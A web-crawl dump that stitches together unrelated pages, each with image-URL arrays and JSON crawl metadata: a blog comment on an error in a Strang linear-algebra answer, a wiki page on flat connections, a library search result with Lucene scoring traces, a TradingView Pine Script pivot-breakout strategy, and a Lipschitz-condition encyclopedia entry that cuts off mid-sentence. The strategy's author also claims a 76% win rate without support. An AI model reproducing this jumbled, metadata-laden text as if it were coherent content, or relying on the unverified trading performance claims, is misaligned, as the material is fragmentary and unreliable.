solution to the exercise.\n\nRather my point is as follows: In the statement of the solution on page 476 Strang shows as a solution the same 2 by 3 matrix that I derived above, and Strang shows that 2 by 3 matrix multiplying the vector (u, v, w) just as I do above, representing a system of two equations in three unknowns. However on the right-hand side Strang shows that 2 by 3 matrix multiplying the vector (u, v, w) to produce the vector (1, 1, 0). This cannot be: since the matrix has only two rows, that multiplication would produce a vector with only two elements, not three (as in the book). Those two elements represent the right-hand sides of the corresponding system of two equations.\n\nSo the left-hand side in the solution of 2.2.12 on page 476 is correct, but the right-hand side of the solution of 2.2.12 on page 476, namely the vector (1, 1, 0), is not. Instead the right-hand side should be the vector (1, 1) as I derived above." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "http://www.assoc-amazon.com/e/ir", null, "http://www.assoc-amazon.com/e/ir", null, "http://www.assoc-amazon.com/e/ir", null, "https://www.assoc-amazon.com/e/ir", null, "https://1.gravatar.com/avatar/75961bbe2e9b512d68f5098e73fd804e", null, "https://2.gravatar.com/avatar/523287496a16cae22d6337ab1aae4491", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9437545,"math_prob":0.9995622,"size":3926,"snap":"2021-43-2021-49","text_gpt3_token_len":928,"char_repetition_ratio":0.1409995,"word_repetition_ratio":0.05,"special_character_ratio":0.23942944,"punctuation_ratio":0.10722891,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.999853,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T07:43:58Z\",\"WARC-Record-ID\":\"<urn:uuid:ff3c4240-48d4-490e-b9a9-662b196f5ea6>\",\"Content-Length\":\"86576\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0079333-b548-47eb-a245-e520b02ff91a>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd834d6e-65f7-4267-bc03-ab6867ea2e68>\",\"WARC-IP-Address\":\"192.0.78.13\",\"WARC-Target-URI\":\"https://math.hecker.org/2011/09/02/linear-algebra-and-its-applications-exercise-2-2-12/\",\"WARC-Payload-Digest\":\"sha1:DRM75Q62OUGFIMDTRCCJXU647BXZ5JGC\",\"WARC-Block-Digest\":\"sha1:HZ3PFQ2KZ73EO46C6Y5BJ47OKZS73O4B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585302.91_warc_CC-MAIN-20211020055136-20211020085136-00716.warc.gz\"}"}
https://diffgeom.subwiki.org/wiki/Flat_connection
[ "# Flat connection\n\n## Definition\n\n### Symbol-free definition\n\nA connection on a vector bundle over a differential manifold is said to be flat or integrable or curvature-free or locally flat if the curvature of the connection is zero everywhere.\n\n### Definition with symbols\n\nA connection", null, "$\\nabla$ on a vector bundle", null, "$E$ over a differential manifold", null, "$M$ is said to be flat or integrable or curvature-free or locally flat if the curvature form vanishes identically, viz for any vector fields", null, "$X$ and", null, "$Y$:", null, "$R(X,Y) = \\nabla_X\\nabla_Y - \\nabla_Y\\nabla_X - \\nabla_{[X,Y]} = 0$\n\n### Definition in local coordinates\n\nIn local coordinates, we require that the curvature matrix should vanish identically; in other words:", null, "$\\Omega := d\\omega + \\omega \\wedge \\omega = 0$\n\nwhere", null, "$\\omega$ is the matrix of connection forms.\n\n### Alternative definitions\n\nFurther information: Flat connection equals module structure over differential operators\n\nRecall that one alternative view of a connection is as giving the space of sections", null, "$\\Gamma(E)$ the structure of a module over the connection algebra of", null, "$M$. Equivalently, it is a way of giving the sheaf of sections", null, "$\\mathcal{E}$ the structure of a sheaf-theoretic module over the sheaf of connection algebras.\n\nThe connection is flat if and only if this descends to a module structure over the sheaf of differential operators. In other words, a flat connection is equivalent to a structure of", null, "$\\mathcal{E}$ as a module over the sheaf of differential operators." ]
[ null, "https://diffgeom.subwiki.org/w/images/math/f/e/3/fe3a83e41074834731743ab803cd4936.png ", null, "https://diffgeom.subwiki.org/w/images/math/3/a/3/3a3ea00cfc35332cedf6e5e9a32e94da.png ", null, "https://diffgeom.subwiki.org/w/images/math/6/9/6/69691c7bdcc3ce6d5d8a1361f22d04ac.png ", null, "https://diffgeom.subwiki.org/w/images/math/0/2/1/02129bb861061d1a052c592e2dc6b383.png ", null, "https://diffgeom.subwiki.org/w/images/math/5/7/c/57cec4137b614c87cb4e24a3d003a3e0.png ", null, "https://diffgeom.subwiki.org/w/images/math/7/6/d/76d3a555197a6dcfbc2de8dde203870b.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/0/a/d0a85ea60462aa5f487a2b489dbf4382.png ", null, "https://diffgeom.subwiki.org/w/images/math/4/d/1/4d1b7b74aba3cfabd624e898d86b4602.png ", null, "https://diffgeom.subwiki.org/w/images/math/a/5/9/a59f9c03407cf39ca2dc9bff9d1935ef.png ", null, "https://diffgeom.subwiki.org/w/images/math/6/9/6/69691c7bdcc3ce6d5d8a1361f22d04ac.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/3/c/d3c305fc416b971cd6d284564e51bf85.png ", null, "https://diffgeom.subwiki.org/w/images/math/d/3/c/d3c305fc416b971cd6d284564e51bf85.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85957897,"math_prob":0.9979682,"size":1275,"snap":"2019-51-2020-05","text_gpt3_token_len":245,"char_repetition_ratio":0.15735641,"word_repetition_ratio":0.26130652,"special_character_ratio":0.17254902,"punctuation_ratio":0.06392694,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99369276,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,10,null,9,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-16T05:40:04Z\",\"WARC-Record-ID\":\"<urn:uuid:27aa3d00-bd89-4ace-b934-84d950e674bc>\",\"Content-Length\":\"21528\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7761c904-d981-403e-bad2-7d48fe8e755a>\",\"WARC-Concurrent-To\":\"<urn:uuid:acdbab23-27ed-4cc4-94f8-01d5d2ddfb80>\",\"WARC-IP-Address\":\"96.126.114.7\",\"WARC-Target-URI\":\"https://diffgeom.subwiki.org/wiki/Flat_connection\",\"WARC-Payload-Digest\":\"sha1:NJSXL66ESLVCUELDQSIJ3JYYPYQD2JCJ\",\"WARC-Block-Digest\":\"sha1:4HWPJXQCADBFZLR43DK3MODTIWTUHGLA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541317967.94_warc_CC-MAIN-20191216041840-20191216065840-00219.warc.gz\"}"}
http://ixtrieve.fh-koeln.de/birds/litie/document/21752
[ "# Document (#21752)\n\nAuthor\nGandhi, S.\nTitle\nProliferation and categories of Internet directories : a database of Internet subject directories\nSource\nReference and user services quarterly. 37(1998) no.4, S.319-331\nYear\n1998\nAbstract\nReviews the exponential growth of Internet resources leading to the emergence of hundreds of Internet directories to organize those resources. Based upon their format, content, and characteristics, these Internet directories are categorized into 8 groups. From one of these groups. 'Subject directories published in professional journals' all published Internet directories are identified and listed in detail. Using Paradox-For-Windows, a comprehensive database of more than 350 of these directories was developed. Analyzes and interprets the data contained in the database and reviews the strengths and weaknesses of print Internet subject directories as compared to online directories and other search engines\nTheme\nInternet\nInformationsmittel\n\n## Similar documents (content)\n\n1. Notess, G.R.: Comparing net directories (1997) 0.26\n```0.26219296 = sum of:\n0.26219296 = product of:\n1.3109648 = sum of:\n0.04439732 = weight(abstract_txt:resources in 528) [ClassicSimilarity], result of:\n0.04439732 = score(doc=528,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.66035515 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.100582086 = weight(abstract_txt:reviews in 528) [ClassicSimilarity], result of:\n0.100582086 = score(doc=528,freq=2.0), product of:\n0.09204745 = queryWeight, product of:\n1.6715724 = boost\n4.945086 = idf(docFreq=826, maxDocs=42740)\n0.011135577 = queryNorm\n1.0927199 = fieldWeight in 528, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.945086 = idf(docFreq=826, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.0745869 = weight(abstract_txt:subject in 528) [ClassicSimilarity], result of:\n0.0745869 = score(doc=528,freq=2.0), product of:\n0.08632504 = queryWeight, product of:\n1.982592 = boost\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.011135577 = queryNorm\n0.86402386 = fieldWeight in 528, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.104782976 = weight(abstract_txt:internet in 528) [ClassicSimilarity], result of:\n0.104782976 = score(doc=528,freq=1.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.5790724 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.9866156 = weight(abstract_txt:directories in 528) [ClassicSimilarity], result of:\n0.9866156 = score(doc=528,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.1245285 = fieldWeight in 528, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.15625 = fieldNorm(doc=528)\n0.2 = coord(5/25)\n```\n2. Boettcher, J.; Kingma, B.R.: Telephone directories : alternatives to print (1994) 0.21\n```0.2071013 = sum of:\n0.2071013 = product of:\n1.2943832 = sum of:\n0.039925013 = weight(abstract_txt:emergence in 1781) [ClassicSimilarity], result of:\n0.039925013 = score(doc=1781,freq=1.0), product of:\n0.07891896 = queryWeight, product of:\n1.0944477 = boost\n6.475505 = idf(docFreq=178, maxDocs=42740)\n0.011135577 = queryNorm\n0.50589883 = fieldWeight in 1781, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.475505 = idf(docFreq=178, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.031393647 = weight(abstract_txt:resources in 1781) [ClassicSimilarity], result of:\n0.031393647 = score(doc=1781,freq=2.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.4669416 = fieldWeight in 1781, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.014712053 = weight(abstract_txt:these in 1781) [ClassicSimilarity], result of:\n0.014712053 = score(doc=1781,freq=1.0), product of:\n0.05850244 = queryWeight, product of:\n1.6321194 = boost\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.011135577 = queryNorm\n0.2514776 = fieldWeight in 1781, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n1.2083524 = weight(abstract_txt:directories in 1781) [ClassicSimilarity], result of:\n1.2083524 = score(doc=1781,freq=6.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.3772606 = fieldWeight in 1781, product of:\n2.4494898 = tf(freq=6.0), with freq of:\n6.0 = termFreq=6.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.078125 = fieldNorm(doc=1781)\n0.16 = coord(4/25)\n```\n3. Chen, S.Y.; Magoulas, G.D.; Dimakopoulos, D.: ¬A flexible interface design for Web directories to accommodate different cognitive styles (2005) 0.16\n```0.16450445 = sum of:\n0.16450445 = product of:\n0.8225223 = sum of:\n0.02219866 = weight(abstract_txt:resources in 4270) [ClassicSimilarity], result of:\n0.02219866 = score(doc=4270,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.33017758 = fieldWeight in 4270, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.020805985 = weight(abstract_txt:these in 4270) [ClassicSimilarity], result of:\n0.020805985 = score(doc=4270,freq=2.0), product of:\n0.05850244 = queryWeight, product of:\n1.6321194 = boost\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.011135577 = queryNorm\n0.35564303 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.2189133 = idf(docFreq=4646, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.05550465 = weight(abstract_txt:groups in 4270) [ClassicSimilarity], result of:\n0.05550465 = score(doc=4270,freq=2.0), product of:\n0.098303944 = queryWeight, product of:\n1.7274472 = boost\n5.1103826 = idf(docFreq=700, maxDocs=42740)\n0.011135577 = queryNorm\n0.5646228 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.1103826 = idf(docFreq=700, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.02637045 = weight(abstract_txt:subject in 4270) [ClassicSimilarity], result of:\n0.02637045 = score(doc=4270,freq=1.0), product of:\n0.08632504 = queryWeight, product of:\n1.982592 = boost\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.011135577 = queryNorm\n0.30547857 = fieldWeight in 4270, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.9101257 = idf(docFreq=2327, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.69764256 = weight(abstract_txt:directories in 4270) [ClassicSimilarity], result of:\n0.69764256 = score(doc=4270,freq=2.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n0.7951617 = fieldWeight in 4270, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.078125 = fieldNorm(doc=4270)\n0.2 = coord(5/25)\n```\n4. Notess, G.R.: Internet ready reference resources (1996) 0.16\n```0.1635546 = sum of:\n0.1635546 = product of:\n1.362955 = sum of:\n0.05327679 = weight(abstract_txt:resources in 4968) [ClassicSimilarity], result of:\n0.05327679 = score(doc=4968,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.7924262 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n0.12573957 = weight(abstract_txt:internet in 4968) [ClassicSimilarity], result of:\n0.12573957 = score(doc=4968,freq=1.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.6948869 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n1.1839386 = weight(abstract_txt:directories in 4968) [ClassicSimilarity], result of:\n1.1839386 = score(doc=4968,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n1.3494341 = fieldWeight in 4968, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.1875 = fieldNorm(doc=4968)\n0.12 = coord(3/25)\n```\n5. MacLeod, D.: ¬The Internet, LEXIS, and WESTLAW : a comparison of resources for the legal researcher (1996) 0.16\n```0.1589028 = sum of:\n0.1589028 = product of:\n0.9931425 = sum of:\n0.049783777 = weight(abstract_txt:leading in 4789) [ClassicSimilarity], result of:\n0.049783777 = score(doc=4789,freq=1.0), product of:\n0.06683387 = queryWeight, product of:\n1.0071696 = boost\n5.959108 = idf(docFreq=299, maxDocs=42740)\n0.011135577 = queryNorm\n0.7448885 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.959108 = idf(docFreq=299, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.035517856 = weight(abstract_txt:resources in 4789) [ClassicSimilarity], result of:\n0.035517856 = score(doc=4789,freq=1.0), product of:\n0.06723249 = queryWeight, product of:\n1.4285944 = boost\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.011135577 = queryNorm\n0.52828413 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.226273 = idf(docFreq=1696, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.1185484 = weight(abstract_txt:internet in 4789) [ClassicSimilarity], result of:\n0.1185484 = score(doc=4789,freq=2.0), product of:\n0.18094969 = queryWeight, product of:\n4.384623 = boost\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.011135577 = queryNorm\n0.65514565 = fieldWeight in 4789, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.7060635 = idf(docFreq=2854, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.78929245 = weight(abstract_txt:directories in 4789) [ClassicSimilarity], result of:\n0.78929245 = score(doc=4789,freq=1.0), product of:\n0.87735933 = queryWeight, product of:\n10.947484 = boost\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.011135577 = queryNorm\n0.8996228 = fieldWeight in 4789, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1969824 = idf(docFreq=86, maxDocs=42740)\n0.125 = fieldNorm(doc=4789)\n0.16 = coord(4/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.68677646,"math_prob":0.9965781,"size":9959,"snap":"2020-45-2020-50","text_gpt3_token_len":3824,"char_repetition_ratio":0.21587142,"word_repetition_ratio":0.41914192,"special_character_ratio":0.53599757,"punctuation_ratio":0.28614718,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99974674,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-26T04:53:02Z\",\"WARC-Record-ID\":\"<urn:uuid:b090e275-b5f9-4671-95e9-8edb65840efc>\",\"Content-Length\":\"19385\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d72d3faa-24ce-41e8-a433-eeade042a710>\",\"WARC-Concurrent-To\":\"<urn:uuid:6dec1fc1-fe0e-406f-a69e-4b2d5a136371>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"http://ixtrieve.fh-koeln.de/birds/litie/document/21752\",\"WARC-Payload-Digest\":\"sha1:FVFIWWXSTHZ6ACLOMFV6A633ZXE4CXIM\",\"WARC-Block-Digest\":\"sha1:7GRYXR44TJLM33EYHS4RBNSMV247YVPB\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107890273.42_warc_CC-MAIN-20201026031408-20201026061408-00575.warc.gz\"}"}
https://se.tradingview.com/script/tBJNISwj-CamarillaStrategy-V1-H4-and-L4-breakout-exits-added/?support
[ "", null, "# CamarillaStrategy -V1 - H4 and L4 breakout - exits added\n\n5319 visningar\n2.6 Profit Factor and 76% Profitable on SPY , 5M - I think it's a pretty good number for an automated strategy that uses Pivots . I don't think it's possible to add volume and day open price in relation to pivot levels -- that's what I do manually ..\n\nStill trying to add EMA for exits.. it will increase profitability. You can play in pinescript with trailing stops entries..\n```//@version=2\n//Created by CristianD\nstrategy(title=\"CamarillaStrategyV1\", shorttitle=\"CD_Camarilla_StrategyV1\", overlay=true)\n//sd = input(true, title=\"Show Daily Pivots?\")\nEMA = ema(close,8)\n\n//Camarilla\npivot = (high + low + close ) / 3.0\nrange = high - low\nh5 = (high/low) * close\nh4 = close + (high - low) * 1.1 / 2.0\nh3 = close + (high - low) * 1.1 / 4.0\nh2 = close + (high - low) * 1.1 / 6.0\nh1 = close + (high - low) * 1.1 / 12.0\nl1 = close - (high - low) * 1.1 / 12.0\nl2 = close - (high - low) * 1.1 / 6.0\nl3 = close - (high - low) * 1.1 / 4.0\nl4 = close - (high - low) * 1.1 / 2.0\nh6 = h5 + 1.168 * (h5 - h4)\nl5 = close - (h5 - close)\nl6 = close - (h6 - close)\n\n// Daily line breaks\n//sopen = security(tickerid, \"D\", open )\n//shigh = security(tickerid, \"D\", high )\n//slow = security(tickerid, \"D\", low )\n//sclose = security(tickerid, \"D\", close )\n//\n// Color\n//dcolor=sopen != sopen ? na : black\n//dcolor1=sopen != sopen ? na : red\n//dcolor2=sopen != sopen ? na : green\n\n//Daily Pivots\ndtime_pivot = security(tickerid, 'D', pivot)\ndtime_h6 = security(tickerid, 'D', h6)\ndtime_h5 = security(tickerid, 'D', h5)\ndtime_h4 = security(tickerid, 'D', h4)\ndtime_h3 = security(tickerid, 'D', h3)\ndtime_h2 = security(tickerid, 'D', h2)\ndtime_h1 = security(tickerid, 'D', h1)\ndtime_l1 = security(tickerid, 'D', l1)\ndtime_l2 = security(tickerid, 'D', l2)\ndtime_l3 = security(tickerid, 'D', l3)\ndtime_l4 = security(tickerid, 'D', l4)\ndtime_l5 = security(tickerid, 'D', l5)\ndtime_l6 = security(tickerid, 'D', l6)\n\n//offs_daily = 0\n//plot(sd and dtime_pivot ? dtime_pivot : na, title=\"Daily Pivot\",color=dcolor, linewidth=2)\n//plot(sd and dtime_h6 ? dtime_h6 : na, title=\"Daily H6\", color=dcolor2, linewidth=2)\n//plot(sd and dtime_h5 ? dtime_h5 : na, title=\"Daily H5\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h4 ? dtime_h4 : na, title=\"Daily H4\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h3 ? dtime_h3 : na, title=\"Daily H3\",color=dcolor1, linewidth=3)\n//plot(sd and dtime_h2 ? dtime_h2 : na, title=\"Daily H2\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_h1 ? dtime_h1 : na, title=\"Daily H1\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l1 ? dtime_l1 : na, title=\"Daily L1\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l2 ? dtime_l2 : na, title=\"Daily L2\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l3 ? dtime_l3 : na, title=\"Daily L3\",color=dcolor1, linewidth=3)\n//plot(sd and dtime_l4 ? dtime_l4 : na, title=\"Daily L4\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l5 ? dtime_l5 : na, title=\"Daily L5\",color=dcolor2, linewidth=2)\n//plot(sd and dtime_l6 ? dtime_l6 : na, title=\"Daily L6\",color=dcolor2, linewidth=2)\n\nlongCondition = close >dtime_h4 and open < dtime_h4 and EMA < close\nif (longCondition)\nstrategy.entry(\"Long\", strategy.long)\nstrategy.exit (\"Exit Long\",\"Long\", trail_points = 40,trail_offset = 1, loss =70)\n//trail_points = 40, trail_offset = 3, loss =70 and\n\nshortCondition = close <dtime_l4 and open >dtime_l4 and EMA > close\nif (shortCondition)\nstrategy.entry(\"Short\", strategy.short)\nstrategy.exit (\"Exit Short\",\"Short\", trail_points = 10,trail_offset = 1, loss =20)\n\n```" ]
[ null, "https://s3.tradingview.com/userpics/101216_mid.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5660409,"math_prob":0.975637,"size":4132,"snap":"2020-10-2020-16","text_gpt3_token_len":1415,"char_repetition_ratio":0.18604651,"word_repetition_ratio":0.28864354,"special_character_ratio":0.36519846,"punctuation_ratio":0.21226993,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98933476,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-06T14:00:34Z\",\"WARC-Record-ID\":\"<urn:uuid:0962e21e-b87e-44ff-a0db-c01c334bb1da>\",\"Content-Length\":\"518399\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eb2cfae0-5520-4abc-aebc-74caa11ab4e8>\",\"WARC-Concurrent-To\":\"<urn:uuid:145c0b1c-42f9-41a0-b9bd-2d8a6329d81a>\",\"WARC-IP-Address\":\"54.192.30.31\",\"WARC-Target-URI\":\"https://se.tradingview.com/script/tBJNISwj-CamarillaStrategy-V1-H4-and-L4-breakout-exits-added/?support\",\"WARC-Payload-Digest\":\"sha1:H5UNEHKJGZVTP2VNFYBYNJOK45U2CZLI\",\"WARC-Block-Digest\":\"sha1:FM7EZ2NHH4N5FZVIQWBUDHGL5ELK2XPA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371637684.76_warc_CC-MAIN-20200406133533-20200406164033-00211.warc.gz\"}"}
https://encyclopedia2.thefreedictionary.com/Lipschitz+Condition
[ "# Lipschitz Condition\n\n## Lipschitz condition\n\n[′lip‚shits kən‚dish·ən]\n(mathematics)\nA function ƒ satisfies such a condition at a point b if |ƒ(x) - ƒ(b)| ≤ K | x-b |, with K a constant, for all x in some neighborhood of b.\nMcGraw-Hill Dictionary of Scientific & Technical Terms, 6E, Copyright © 2003 by The McGraw-Hill Companies, Inc.\nThe following article is from The Great Soviet Encyclopedia (1979). It might be outdated or ideologically biased.\n\n## Lipschitz Condition\n\na restriction on the behavior of an increment of a function. If for any points x and x″ in the interval [a, b ] the increment of a function satisfies the inequality\n\nǀf(x) - f(x′) ≤ Mǀ x - x′ǀα\n\nwhere 0 < α ≤ 1 and where M is some constant, a function f(x) is said to satisfy a Lipschitz condition of order α on the interval [a, b ]; this is written as f(x) ∈ Lip a. Every function satisfying a Lipschitz condition on the interval [a, b ] for some α > 0 is uniformly continuous on [a, b ]. A function having a bounded derivative on [a, b ] satisfies a Lipschitz condition on [a, b ] for any α ≤ 1.\n\nThe Lipschitz condition was first examined in 1864 by the German mathematician R. Lipschitz (1832–1903) as a sufficient condition for the convergence of the Fourier series of a function f(x). Although it is historically inaccurate, some mathematicians associate only the most important case of the Lipschitz condition, that of α = 1, with the name of Lipschitz; for the case α < 1 they speak of the Hölder condition.\n\nMentioned in ?\nReferences in periodicals archive ?\nWe first prove that [MATHEMATICAL EXPRESSION NOT 